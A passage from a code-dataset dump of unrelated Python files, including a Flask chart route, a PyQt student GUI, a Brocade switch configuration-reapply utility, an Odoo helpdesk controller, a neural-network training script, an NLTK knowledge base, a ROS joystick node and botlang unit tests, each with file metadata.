repoLanguages\n\n@app.route('/linechart')\ndef line():\n line_labels=labels\n line_values=values\n return render_template('linechart.html', title='Bitcoin Monthly Price in USD', max=17000, labels=line_labels, values=line_values)\n\nif __name__ == '__main__':\n app.run(threaded=True, port=5000)","sub_path":"app/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4932,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"582171734","text":"import math\n\n# Explicitly adjusted hyperparameters\nconv_out_channels = 8\nconv_kernel_size = 5\nconv_stride = 1\n\npool_kernel_size = 3\npool_stride = 3\n\nlin_out_features = 32\n\nembedding_length = 8\n\n# Implicitly adjusted hyperparameters\nlin_in_features = int(math.pow(((26 - conv_kernel_size - pool_kernel_size) \\\n /3 + 1), 2)) * conv_out_channels\n\nhead_in_features = lin_out_features + embedding_length\n","sub_path":"nets/indigooryx/hyperparameters.py","file_name":"hyperparameters.py","file_ext":"py","file_size_in_byte":402,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"417863815","text":"#!/usr/bin/env python3\n#By Dr.ZCH\n\nimport sys\nfrom PyQt5.QtWidgets import *\nfrom PyQt5.QtGui import *\nfrom PyQt5.QtGui import *\nimport sql\n\nclass Table(QStandardItemModel):\n def __init__(self,name):\n super(Table,self).__init__()\n self.setHorizontalHeaderLabels(sql.header(name))\n def put(self,content): \n for row in content:\n items=[]\n for i in row:\n items.append(QStandardItem(str(i)))\n self.appendRow(items)\n \nclass Window(QWidget):\n def button1(self):\n self.TableB.clear()\n self.TableB=Table('s')\n self.TableB.put(sql.s(self.EditB1.text()))\n self.tableB.setModel(self.TableB)\n self.B3.setTitle('学号为'+self.EditB1.text()+'的基本信息')\n self.show()\n\n def button2(self):\n self.TableB.clear()\n self.TableB=Table('c')\n self.TableB.put(sql.c(self.EditB1.text()))\n self.tableB.setModel(self.TableB)\n self.B3.setTitle('学号为'+self.EditB1.text()+'的已选课程')\n self.show()\n def button3(self):\n self.TableB.clear()\n self.TableB=Table('sc')\n self.TableB.put(sql.sc(self.EditB1.text()))\n self.tableB.setModel(self.TableB)\n self.B3.setTitle('学号为'+self.EditB1.text()+'的课程成绩')\n def __init__(self):\n super(Window, self).__init__()\n\n self.setWindowTitle('学生管理系统')\n self.setGeometry(200,200,800,400)\n\n self.tableA = QTableView()\n self.TableA = Table('s')\n self.TableA.put(sql.content('s'))\n\n self.tableA.setModel(self.TableA)\n self.tableA.verticalHeader().hide()\n self.tableA.horizontalHeader().setStretchLastSection(True)\n\n self.A = QGroupBox()\n self.A.setTitle('学生名单')\n self.A.setLayout(QVBoxLayout())\n self.A.layout().addWidget(self.tableA) \n self.A.setFixedSize(400,300)\n\n self.LabelB1=QLabel('请输入学号:',self)\n self.EditB1=QLineEdit()\n self.Button1=QPushButton('查询基本信息',self)\n self.Button1.clicked.connect(self.button1)\n self.Button2=QPushButton('查询已选课程',self)\n self.Button2.clicked.connect(self.button2)\n self.Button3=QPushButton('查询课程成绩',self)\n self.Button3.clicked.connect(self.button3)\n\n self.TableB=Table('s')\n self.tableB=QTableView()\n self.tableB.setModel(self.TableB)\n self.tableB.verticalHeader().hide()\n self.tableB.horizontalHeader().setStretchLastSection(True)\n\n self.B3=QGroupBox()\n self.B3.setLayout(QVBoxLayout())\n self.B3.setFixedSize(400,250)\n self.B3.layout().addWidget(self.tableB)\n \n self.B1=QHBoxLayout()\n self.B2=QHBoxLayout()\n self.B1.addWidget(self.LabelB1)\n self.B1.addWidget(self.EditB1)\n self.B2.addWidget(self.Button1)\n self.B2.addWidget(self.Button2)\n self.B2.addWidget(self.Button3)\n\n self.B = QGroupBox()\n self.B.setTitle('学生信息')\n self.B.setLayout(QVBoxLayout())\n self.B.layout().addLayout(self.B1)\n self.B.layout().addLayout(self.B2)\n self.B.layout().addWidget(self.B3)\n \n self.mainLayout = QHBoxLayout()\n self.mainLayout.addWidget(self.A)\n self.mainLayout.addWidget(self.B)\n\n self.setLayout(self.mainLayout)\n self.show()\n\n\nif __name__=='__main__':\n app=QApplication(sys.argv)\n w=Window()\n sys.exit(app.exec_())\n","sub_path":"gui_sql/student.py","file_name":"student.py","file_ext":"py","file_size_in_byte":3535,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"287849543","text":"#very nice to read way\n\ndef iq_test(numbers):\n list_of_numbers = [int(i) for i in numbers.split(' ')]\n first_three = list_of_numbers[:3]\n even, odd = 0, 0\n for i in first_three:\n if i % 2:\n odd += 1\n else:\n even += 1\n\n if odd > even:\n for number in list_of_numbers:\n if number % 2 == 0:\n return list_of_numbers.index(number) + 1\n else:\n for number in list_of_numbers:\n if number % 2 == 1:\n return list_of_numbers.index(number) + 1\n\n#cool more concise way\ndef iq_test(numbers):\n parity_list = [int(i) % 2 for i in numbers.split(' ')]\n return parity_list.index(0) + 1 if parity_list.count(1) > 1 else parity_list.index(1) + 1\n#trashy 1 liner\ndef iq_test(numbers):\n return [int(i) % 2 for i in numbers.split(' ')].index(0) + 1 if [int(i) % 2 for i in numbers.split(' ')].count(1) > 1 else [int(i) % 2 for i in numbers.split(' ')].index(1) + 1\n\nprint(iq_test(\"2 4 7 8 10\"),3)\nprint(iq_test(\"1 2 2\"), 1)\n","sub_path":"6 kyu/18_10_02_iq_test.py","file_name":"18_10_02_iq_test.py","file_ext":"py","file_size_in_byte":1028,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"208324108","text":"# coding=utf-8\n\n\nclass Container:\n\n def __init__(self):\n self.message = self.parent = None\n self.children = []\n\n\n def remove_child(self, child):\n self.children.remove(child)\n # Remove the child, and remove the parent-link\n child.parent = None\n\n def add_child(self, child):\n # If child has a parent remove! the new one is self! Remove also the child from its parent to destroy\n # all the previous links.\n if child.parent:\n child.parent.remove_child(child)\n child.parent = self\n self.children.append(child)\n\n def introduce_loop(self, rfr_container):\n\n # Check all children of the container, and recursively all sub-children.\n container_list = []\n container_list.append(self)\n visited = []\n\n while len(container_list) > 0:\n\n extracted_container = container_list.pop()\n\n if extracted_container is rfr_container:\n return True\n\n else:\n visited.append(extracted_container)\n for child in extracted_container.children:\n if child not in visited:\n container_list.append(child)\n\n return False\n","sub_path":"script_mail_analysis/container.py","file_name":"container.py","file_ext":"py","file_size_in_byte":1236,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"617353850","text":"#!/usr/bin/env python3\n\n# Copyright 2017 Brocade Communications Systems, Inc. All rights reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may also obtain a copy of the License at\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\"\"\"\n\n:mod:`switch_config_apply` - PyFOS util for specific config op use case.\n***********************************************************************************\nThe :mod:`switch_config_apply` provides for specific config op use case.\n\nThis module is a standalone script that can be used to apply saved\nconfiguration files to the switch. Any drift will be reset to the\nsaved value.\n\n* inputs:\n * -L=: Login ID. If not provided, interactive\n prompt will request one.\n * -P=: Password. If not provided, interactive\n prompt will request one.\n * -i=: IP address\n * -c=: name of the directory that contains\n JSON encoded switch configuration files\n * -f=: VFID or -1 if VF is disabled. If unspecified,\n VFID of 128 is assumed.\n\n* outputs:\n * List of attributes that changed.\n\n\"\"\"\n\nimport pyfos.pyfos_auth as pyfos_auth\nimport pyfos.pyfos_zone as pyfos_zone\nimport pyfos.pyfos_switch as pyfos_switch\nimport pyfos.pyfos_switchfcport as pyfos_switchfcport\nimport pyfos.pyfos_util as pyfos_util\nimport sys\nimport pyfos.utils.brcd_util as brcd_util\nimport json\nimport jsondiff\n\n\ndef usage():\n print(\"usage:\")\n print('switch_config_apply.py -i -c ')\n\n\ndef apply_to_object_help(\n session, pyfos_class, pyfos_object, old_object_in_dict, diffs):\n patch_object = pyfos_class()\n # find if any keys and populate with the current values\n object_keys = []\n for key in pyfos_object.namekeys():\n if pyfos_object.is_key_attrib(key):\n object_keys.append(key)\n base_id = old_object_in_dict[pyfos_object.getcontainer()]\n for key in object_keys:\n # print(object.getattribute(key).getuservalue())\n patch_object.getattribute(key).setuservalue(\n pyfos_object.getattribute(key).getuservalue())\n base_id = base_id[key]\n # print(base_id)\n # print(patch_object.getattribute(key).getuservalue())\n\n changed = False\n for key, value in diffs.items():\n for key, value in diffs[pyfos_object.getcontainer()].items():\n if pyfos_object.getattribute(key).getisconfig():\n patch_object.getattribute(key).setvalue(\n old_object_in_dict[pyfos_object.getcontainer()][key])\n # print(patch_object.getattribute(key).getuservalue())\n print(\"\\t\", base_id, key, \"reverted from\", value, \"to\",\n patch_object.getattribute(key).getuservalue())\n changed = True\n else:\n print(\"\\t\", base_id, \"read-only\", key, \"remains at\", value)\n\n if changed:\n result = patch_object.patch(session)\n print(pyfos_class.__name__, \"patch result:\", result)\n\n\ndef apply_to_object(session, dir_name, pyfos_class):\n pyfos_object = pyfos_class.get(session)\n current_object_in_dict = json.loads(\n json.dumps(\n pyfos_object, cls=pyfos_util.json_encoder,\n sort_keys=True, indent=4))\n fp = open(dir_name + \"/\" + pyfos_class.__name__, 'r')\n old_object_in_dict = json.load(fp)\n fp.close()\n diffs = jsondiff.diff(old_object_in_dict, current_object_in_dict)\n if len(diffs) == 0:\n print(pyfos_class.__name__ + \" has not drifted\")\n else:\n print(pyfos_class.__name__ + \" diff(s) are:\")\n apply_to_object_help(\n session, pyfos_class, pyfos_object, old_object_in_dict, diffs)\n\n\ndef apply_to_object_list(session, dir_name, pyfos_class):\n pyfos_object = pyfos_class.get(session)\n current_object_in_dict = json.loads(\n json.dumps(\n pyfos_object, cls=pyfos_util.json_encoder,\n sort_keys=True, indent=4))\n fp = open(dir_name + \"/\" + pyfos_class.__name__, 'r')\n old_object_in_dict = json.load(fp)\n fp.close()\n diffs = jsondiff.diff(old_object_in_dict, current_object_in_dict)\n if len(diffs) == 0:\n print(pyfos_class.__name__ + \" has not drifted\")\n else:\n print(pyfos_class.__name__ + \" diff(s) are:\")\n for key, value in diffs.items():\n apply_to_object_help(\n session, pyfos_class, pyfos_object[key],\n old_object_in_dict[key], value)\n\n\ndef main(argv):\n isHttps = \"0\"\n\n inputs = brcd_util.generic_input(argv, usage)\n\n session = pyfos_auth.login(inputs[\"login\"], inputs[\"password\"],\n inputs[\"ipaddr\"], isHttps)\n if pyfos_auth.is_failed_login(session):\n print(\"login failed because\",\n session.get(pyfos_auth.CREDENTIAL_KEY)\n [pyfos_auth.LOGIN_ERROR_KEY])\n usage()\n sys.exit()\n\n brcd_util.exit_register(session)\n\n vfid = None\n if 'vfid' in inputs:\n vfid = inputs['vfid']\n\n if vfid is not None:\n pyfos_auth.vfid_set(session, vfid)\n\n if 'compare' not in inputs or inputs['compare'] is None:\n usage()\n sys.exit()\n\n dir_name = inputs['compare']\n\n apply_to_object(session, dir_name, pyfos_switch.fibrechannel_switch)\n apply_to_object_list(session, dir_name, pyfos_switchfcport.fibrechannel)\n apply_to_object(session, dir_name, pyfos_zone.defined_configuration)\n apply_to_object(session, dir_name, pyfos_zone.effective_configuration)\n\n pyfos_auth.logout(session)\n\n\nif __name__ == \"__main__\":\n main(sys.argv[1:])\n","sub_path":"pyfos/utils/config/switch_config_apply.py","file_name":"switch_config_apply.py","file_ext":"py","file_size_in_byte":6007,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"209684387","text":"# -*- coding: utf-8 -*-\n\nimport datetime\n\nfrom werkzeug.exceptions import NotFound\n\nfrom odoo import http\nfrom odoo.http import request\n\nfrom odoo.addons.website_helpdesk.controllers.main import website_account\nfrom odoo.addons.website_helpdesk_form.controller.main import WebsiteForm\n\nclass website_account(website_account):\n\n @http.route(['/my/tickets'], type='http', auth=\"user\", website=True)\n def my_helpdesk_tickets(self, **kw):\n values = self._prepare_portal_layout_values()\n user = request.env.user\n\n contract_partner = user.partner_id.parent_id.id or user.partner_id.id\n partner_ids = []\n partner_ids.append(user.partner_id.id)\n\n # supports tickets \n filtred_support = []\n supports = request.env['helpdesk.team'].search([('website_published','=',True),('support_team','=',True)])\n for support in supports :\n if contract_partner in support.partner_ids.ids:\n filtred_support.append(support)\n\n \n # contracts tickets\n user_contract = request.env['helpdesk.team'].search([('website_published','=',True),('partner_id','=',contract_partner)])\n\n # USERS WANT SEE ALL TICKETS OF HIS COMPANY\n if kw.get('filtred_tickets') and kw.get('filtred_tickets') == 'partner_tickets' :\n if user.partner_id.parent_id.id:\n parent_users = request.env['res.partner'].search([('parent_id','=',user.partner_id.parent_id.id)])\n partner_ids = parent_users.ids\n\n tickets = request.env['helpdesk.ticket'].sudo().search(['|', ('user_id', '=', user.id), ('partner_id', 'in', partner_ids)])\n \n values.update({\n 'tickets': tickets,\n 'filtre': kw.get('filtred_tickets') or 'my_tickets',\n 'supports':filtred_support,\n 'user_contract': user_contract,\n 'default_url': '/my/tickets',\n })\n return request.render(\"website_helpdesk.portal_helpdesk_ticket\", values)\n\n\n\nclass WebsiteForm(WebsiteForm):\n\n @http.route('''/helpdesk//submit''', type='http', auth=\"public\", website=True)\n def website_helpdesk_form(self, team, **kwargs):\n default_values = {}\n if request.env.user.partner_id != request.env.ref('base.public_partner'):\n default_values['name'] = request.env.user.partner_id.name\n default_values['email'] = request.env.user.partner_id.email\n #types ticket\n ticket_type_ids = request.env['helpdesk.ticket.type'].search([])\n \n #types ticket\n sourceChannel = request.env['utm.medium'].search([('name','=','Website')])[0]\n \n default_values['utm_medium_id'] = sourceChannel.id\n \n return request.render(\"website_helpdesk_form.ticket_submit\", {'team': team, 'ticket_type_ids': ticket_type_ids,'default_values': default_values})\n\n\n# @http.route(['/helpdesk/', '/helpdesk/'], type='http', auth=\"public\", website=True)\n# def website_helpdesk_teams(self, team=None, **kwargs):\n# search = kwargs.get('search')\n# # For breadcrumb index: get all team\n# teams = request.env['helpdesk.team'].search(['|', '|', ('use_website_helpdesk_form', '=', True), ('use_website_helpdesk_forum', '=', True), ('use_website_helpdesk_slides', '=', True)], order=\"id asc\")\n# if not request.env.user.has_group('helpdesk.group_helpdesk_manager'):\n# teams = teams.filtered(lambda team: team.website_published)\n# if not teams:\n# return request.render(\"website_helpdesk.not_published_any_team\")\n# result = self.get_helpdesk_team_data(team or teams[0], search=search)\n# # For breadcrumb index: get all team\n# result['teams'] = teams\n# return request.render(\"website_helpdesk.team\", result)\n\n","sub_path":"Macq_Website/macq_helpdesk/controllers/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3876,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"50243273","text":"import numpy as np\nimport torch\nfrom torch.nn.utils import parameters_to_vector\nfrom torch.utils.data import DataLoader\nfrom torch.optim import Adam\nfrom torch.optim.lr_scheduler import LambdaLR\nfrom torchvision.datasets import VisionDataset\nfrom tqdm import tqdm\n\nfrom preds.models import CIFAR10Net, CIFAR100Net, MLPS\nfrom preds.datasets import MNIST, FMNIST, CIFAR10\n\ntorch.backends.cudnn.deterministic = True\ntorch.backends.cudnn.benchmark = False\n\n\nclass QuickDS(VisionDataset):\n\n def __init__(self, ds, device):\n self.D = [(ds[i][0].to(device), torch.tensor(ds[i][1]).to(device))\n for i in range(len(ds))]\n self.K = ds.K\n self.channels = ds.channels\n self.pixels = ds.pixels\n\n def __getitem__(self, index):\n return self.D[index]\n\n def __len__(self):\n return len(self.D)\n\n\ndef get_dataset(dataset, double, device=None):\n if dataset == 'MNIST':\n ds_train = MNIST(train=True, double=double)\n ds_test = MNIST(train=False, double=double)\n elif dataset == 'FMNIST':\n ds_train = FMNIST(train=True, double=double)\n ds_test = FMNIST(train=False, double=double)\n elif dataset == 'CIFAR10':\n ds_train = CIFAR10(train=True, double=double)\n ds_test = CIFAR10(train=False, double=double)\n else:\n raise ValueError('Invalid dataset argument')\n if device is not None:\n return QuickDS(ds_train, device), QuickDS(ds_test, device)\n else:\n return ds_train, ds_test\n\n\ndef get_model(model_name, ds_train):\n if model_name == 'MLP':\n input_size = ds_train.pixels ** 2 * ds_train.channels\n hidden_sizes = [1024, 512, 256, 128]\n output_size = ds_train.K\n return MLPS(input_size, hidden_sizes, output_size, 'tanh', flatten=True)\n elif model_name == 'CNN':\n return CIFAR10Net(ds_train.channels, ds_train.K, use_tanh=True)\n elif model_name == 'AllCNN':\n return CIFAR100Net(ds_train.channels, ds_train.K)\n else:\n raise ValueError('Invalid model name')\n\n\ndef evaluate(model, data_loader, criterion, device):\n model.eval()\n loss, acc = 0, 0\n with torch.no_grad():\n for X, y in data_loader:\n X, y = X.to(device), y.to(device)\n fs = model(X)\n acc += (torch.argmax(fs, dim=-1) == y).sum().cpu().float().item()\n loss += criterion(fs, y).item()\n return loss / len(data_loader.dataset), acc / len(data_loader.dataset)\n\n\ndef main(ds_train, ds_test, model_name, seed, n_epochs, batch_size, lr, deltas, device, fname):\n train_loader = DataLoader(ds_train, batch_size=batch_size, shuffle=True)\n test_loader = DataLoader(ds_test, batch_size=batch_size, shuffle=False)\n for delta in deltas:\n torch.manual_seed(seed)\n model = get_model(model_name, ds_train).to(device)\n optim = Adam(model.parameters(), lr=lr, weight_decay=delta)\n scheduler = LambdaLR(optim, lr_lambda=lambda epoch: 1/(epoch // 10 + 1))\n criterion = torch.nn.CrossEntropyLoss(reduction='sum')\n losses = list()\n N = len(ds_train)\n # training\n for epoch in tqdm(list(range(n_epochs))):\n running_loss = 0.0\n for X, y in train_loader:\n # X, y = X.to(device), y.to(device)\n M = len(y)\n optim.zero_grad()\n fs = model(X)\n loss = N / M * criterion(fs, y)\n loss.backward()\n optim.step()\n p = parameters_to_vector(model.parameters()).detach()\n running_loss += loss.item() + (1/2 * delta * p.square().sum()).item()\n loss_avg = running_loss / len(train_loader)\n losses.append(loss_avg)\n scheduler.step()\n # evaluation\n tr_loss, tr_acc = evaluate(model, train_loader, criterion, device)\n te_loss, te_acc = evaluate(model, test_loader, criterion, device)\n metrics = {'test_loss': te_loss, 'test_acc': te_acc,\n 'train_loss': tr_loss, 'train_acc': tr_acc}\n\n state = {'model': model.state_dict(), 'optimizer': optim.state_dict(),\n 'losses': losses, 'metrics': metrics, 'delta': delta}\n torch.save(state, fname.format(delta=delta))\n\n\nif __name__ == '__main__':\n import argparse\n parser = argparse.ArgumentParser()\n datasets = ['MNIST', 'FMNIST', 'CIFAR10']\n models = ['CNN', 'AllCNN', 'MLP']\n parser.add_argument('-d', '--dataset', help='dataset', choices=datasets)\n parser.add_argument('-m', '--model', help='which model to train', choices=models)\n parser.add_argument('-s', '--seed', help='randomness seed', default=117, type=int)\n parser.add_argument('--n_epochs', help='epochs training neural network', default=500, type=int)\n parser.add_argument('--batch_size', default=512, type=int)\n parser.add_argument('--lr', help='neural network learning rate', default=1e-3, type=float)\n parser.add_argument('--n_deltas', help='number of deltas to try', default=16, type=int)\n parser.add_argument('--logd_min', help='min log delta', default=-2.0, type=float)\n parser.add_argument('--logd_max', help='max log delta', default=3.0, type=float)\n parser.add_argument('--double', help='double precision', action='store_true')\n args = parser.parse_args()\n dataset = args.dataset\n double = args.double\n model_name = args.model\n seed = args.seed\n n_epochs = args.n_epochs\n lr = args.lr\n batch_size = args.batch_size\n n_deltas = args.n_deltas\n logd_min, logd_max = args.logd_min, args.logd_max\n\n if double:\n torch.set_default_dtype(torch.double)\n\n device = 'cuda' if torch.cuda.is_available() else 'cpu'\n\n ds_train, ds_test = get_dataset(dataset, double, device)\n\n # naming convention: dataset_model_seed_delta\n fname = 'models/' + '_'.join([dataset, model_name, str(seed)]) + '_{delta:.1e}.pt'\n deltas = np.logspace(logd_min, logd_max, n_deltas)\n deltas = np.insert(deltas, 0, 0) # add unregularized network\n\n main(ds_train, ds_test, model_name, seed, n_epochs, batch_size, lr, deltas, device, fname)\n","sub_path":"Laplace_GCN_Code/experiments/imgclassification.py","file_name":"imgclassification.py","file_ext":"py","file_size_in_byte":6111,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"619092716","text":"import sys\nfrom nltk.sem import Expression\nfrom nltk.inference import ResolutionProver\nimport pandas\n\n# expression for NLP, knowledge base intialisation\nread_expr = Expression.fromstring\nkb=[]\ndata = pandas.read_csv('./data/kb.csv', header=None)\n[kb.append(read_expr(row)) for row in data[0]]\n#If we enter a blank expression, the KB will check for contradictions, \n#returning true if there is a problem\nanswer=ResolutionProver().prove(\"\", kb, verbose=False)\nif answer:\n print(\"Contradiction with the knowledge base, exiting\")\n sys.exit()\n\ndef add_knowledge(statement, verbose=False):\n replys = []\n object, subject = statement.split(' is ')\n expr=read_expr(subject + '(' + object + ')')\n print(expr)\n kb.append(expr) \n answer=ResolutionProver().prove(expr, kb, verbose=verbose)\n if answer:\n replys.append(\"OK, I will remember that {} is {}\".format(object, subject))\n else:\n kb.remove(expr)\n replys.append(\"This is contradicting! I have ignored you.\")\n \n replys.append(\"Anything else you would like to know?\")\n return replys\n\ndef check_knowledge(statement, verbose=False):\n # check that * is *\"\n replys = []\n object, subject = statement.split(' is ')\n raw_expr = subject + '(' + object + ')'\n expr=read_expr(raw_expr)\n answer=ResolutionProver().prove(expr, kb, verbose=verbose)\n if answer:\n replys.append(\"That is Correct!\")\n else:\n if \"not\" in subject:\n subject = subject.replace(\"not\", \"\")\n else:\n subject = \"not \" + subject\n expr=read_expr(subject + '(' + object + ')')\n answer=ResolutionProver().prove(expr, kb, verbose=verbose)\n if answer:\n replys.append(\"This is definitely false\")\n else:\n replys.append(\"Sorry I don't know.\")\n \n replys.append(\"Anything else you would like to know?\")\n return replys","sub_path":"knowledge.py","file_name":"knowledge.py","file_ext":"py","file_size_in_byte":1895,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"208228096","text":"import unittest\n\nimport math\n\nfrom botlang.interpreter import BotlangSystem\n\n\nclass BotlangTestCase(unittest.TestCase):\n\n def test_filter(self):\n\n filtered_list = BotlangSystem.run(\"\"\"\n (filter (function (v) (> v 3)) (list 5 2 8 9 1 33 -1 -5 4))\n \"\"\")\n self.assertEqual(filtered_list, [5, 8, 9, 33, 4])\n\n def test_sort(self):\n\n sorted_lists = BotlangSystem.run(\"\"\"\n [define num-list (list 5 3 0 4 9 1)]\n [define asc-nums (sort (function (a b) (< a b)) num-list)]\n [define desc-nums (sort (function (a b) (> a b)) num-list)]\n\n [define objs-list\n (list\n (list \"holi\" 1)\n (list \"shao\" 4)\n (list \"bla\" -3)\n (list \"lala\" -8)\n )\n ]\n [define asc-objs\n (sort [function (a b) (< (get a 1) (get b 1))] objs-list)\n ]\n [define desc-objs\n (sort [function (a b) (> (get a 1) (get b 1))] objs-list)\n ]\n\n (make-dict\n (list\n (list \"asc-nums\" asc-nums)\n (list \"desc-nums\" desc-nums)\n (list \"asc-objs\" asc-objs)\n (list \"desc-objs\" desc-objs)\n )\n )\n \"\"\")\n self.assertEqual(sorted_lists['asc-nums'], [0, 1, 3, 4, 5, 9])\n self.assertEqual(sorted_lists['desc-nums'], [9, 5, 4, 3, 1, 0])\n self.assertEqual(\n sorted_lists['asc-objs'],\n [[\"lala\", -8], [\"bla\", -3], [\"holi\", 1], [\"shao\", 4]]\n )\n self.assertEqual(\n sorted_lists['desc-objs'],\n [[\"shao\", 4], [\"holi\", 1], [\"bla\", -3], [\"lala\", -8]]\n )\n\n def test_type_conversion(self):\n\n str_to_num = BotlangSystem.run('(num \"666\")')\n self.assertEqual(str_to_num, 666)\n\n num_to_str = BotlangSystem.run('(str 666)')\n self.assertEqual(num_to_str, \"666\")\n\n def test_base64(self):\n\n encoded = BotlangSystem.run('(b64-encode \"hólá\")')\n self.assertEqual(encoded, 'aMOzbMOh')\n\n decoded = BotlangSystem.run('(b64-decode \"aMOzbMOh\")')\n self.assertEqual(decoded, 'hólá')\n\n def test_compression(self):\n\n text = \"\"\"\n Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod\n tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim\n veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea\n commodo consequat. Duis aute irure dolor in reprehenderit in voluptate\n velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint\n occaecat cupidatat non proident, sunt in culpa qui officia deserunt\n mollit anim id est laborum.\n \"\"\"\n\n self.assertEqual(len(text), 511)\n compressed = BotlangSystem.run('(bz2-compress \"{0}\")'.format(text))\n self.assertEqual(len(compressed), 420)\n\n decompressed = BotlangSystem.run(\n '(bz2-decompress \"{0}\")'.format(compressed)\n )\n self.assertEqual(len(decompressed), len(text))\n\n def test_reverse(self):\n\n result = BotlangSystem.run('(reverse (list 1 2 3 4))')\n self.assertEqual(result, [4, 3, 2, 1])\n\n result = BotlangSystem.run('(reverse \"sergio\")')\n self.assertEqual(result, \"oigres\")\n\n def test_enumerate(self):\n\n result = BotlangSystem.run('(enumerate \"abcd\")')\n self.assertEqual(result, [(0, 'a'), (1, 'b'), (2, 'c'), (3, 'd')])\n\n def test_sum(self):\n\n result = BotlangSystem.run('(sum (list 1 2 3 4 10))')\n self.assertEqual(result, 20)\n\n def test_type(self):\n\n self.assertTrue(\n BotlangSystem.run('(list? (list 1 2 3))')\n )\n self.assertFalse(\n BotlangSystem.run('(list? \"bla\")')\n )\n\n def test_string_append(self):\n\n self.assertEqual(\n BotlangSystem.run('(append \"holi\" \"hola\")'),\n 'holihola'\n )\n\n def test_list_append(self):\n\n self.assertEqual(\n BotlangSystem.run('(append (list 1 2) (list 3))'),\n [1, 2, 3]\n )\n\n def test_any_satisfy(self):\n\n self.assertTrue(\n BotlangSystem.run(\n '(any-satisfy? (fun (x) (equal? x 3)) (list 1 2 3 4))'\n )\n )\n self.assertTrue(\n BotlangSystem.run(\n '(any-satisfy? (fun (x) (equal? x 2)) (list 1 2 3 4))'\n )\n )\n self.assertFalse(\n BotlangSystem.run(\n '(any-satisfy? (fun (x) (equal? x -1)) (list 1 2 3 4))'\n )\n )\n\n def test_timestamp(self):\n\n t0 = math.floor(BotlangSystem.run('(timestamp)'))\n import time\n time.sleep(0.51)\n t1 = round(BotlangSystem.run('(timestamp)'))\n self.assertEqual(t1 - t0, 1)\n\n def test_type_checking(self):\n\n self.assertTrue(BotlangSystem().eval('(bool? #t)'))\n self.assertTrue(BotlangSystem().eval('(bool? #f)'))\n self.assertFalse(BotlangSystem().eval('(bool? \"#t\")'))\n self.assertFalse(BotlangSystem().eval('(bool? \"#f\")'))\n\n self.assertTrue(BotlangSystem().eval('(str? \"#t\")'))\n self.assertTrue(BotlangSystem().eval('(str? \"#f\")'))\n self.assertFalse(BotlangSystem().eval('(str? 2)'))\n self.assertFalse(BotlangSystem().eval('(str? #f)'))\n\n self.assertTrue(BotlangSystem().eval('(num? 1)'))\n self.assertTrue(BotlangSystem().eval('(num? 6.1212121)'))\n self.assertFalse(BotlangSystem().eval('(num? \"#t\")'))\n self.assertFalse(BotlangSystem().eval('(num? #f)'))\n\n self.assertTrue(BotlangSystem().eval('(int? 2)'))\n self.assertTrue(BotlangSystem().eval('(int? -667)'))\n self.assertFalse(BotlangSystem().eval('(int? 6.12)'))\n self.assertFalse(BotlangSystem().eval('(int? \"#f\")'))\n\n self.assertTrue(BotlangSystem().eval('(list? (list 1 2 3))'))\n self.assertTrue(BotlangSystem().eval('(list? (list))'))\n self.assertFalse(BotlangSystem().eval('(list? 1)'))\n self.assertFalse(BotlangSystem().eval('(list? \"#f\")'))\n\n def test_random(self):\n iterations = 100\n for _ in range(iterations):\n value = BotlangSystem().eval('(random 0 5)')\n self.assertTrue(0 <= value <= 5)\n","sub_path":"tests/primitives/test_primitives.py","file_name":"test_primitives.py","file_ext":"py","file_size_in_byte":6359,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"515473425","text":"#!/usr/bin/env python\n\nimport rospy\nfrom sensor_msgs.msg import Joy\nfrom marine_msgs.msg import Helm\nfrom std_msgs.msg import String\n\nhelm_publisher = None\npiloting_mode_publisher = None\nstate = 'standby'\n\ndef joystickCallback(msg):\n global state\n \n state_request = None\n if msg.buttons[0]:\n state_request = 'manual'\n if msg.buttons[1]:\n state_request = 'autonomous'\n if msg.buttons[2]:\n state_request = 'standby'\n if state_request is not None and state_request != state:\n piloting_mode_publisher.publish('piloting_mode '+state_request)\n state = state_request\n \n if state == 'manual':\n helm = Helm()\n helm.header.stamp = rospy.Time.now()\n helm.throttle = msg.axes[1]\n helm.rudder = -msg.axes[3]\n helm_publisher.publish(helm)\n \nif __name__ == '__main__':\n rospy.init_node('joy_to_helm')\n helm_publisher = rospy.Publisher('/udp/helm', Helm, queue_size=10)\n piloting_mode_publisher = rospy.Publisher('/send_command', String, queue_size=10)\n joy_subscriber = rospy.Subscriber('/joy', Joy, joystickCallback)\n rospy.spin()\n \n","sub_path":"nodes/joy_to_helm.py","file_name":"joy_to_helm.py","file_ext":"py","file_size_in_byte":1137,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"624229436","text":"import torch\nimport cv2\nimport rasterio\nimport numpy as np\nfrom dataloader import make_grid, identity, Window, rle_numba_encode\nimport gc\nimport pathlib\nimport pandas as pd\nimport glob\nimport os\nfrom tqdm import tqdm\nfrom torchvision import transforms as T\nfrom model import get_unet_model\n\nDEVICE = 'cuda' if 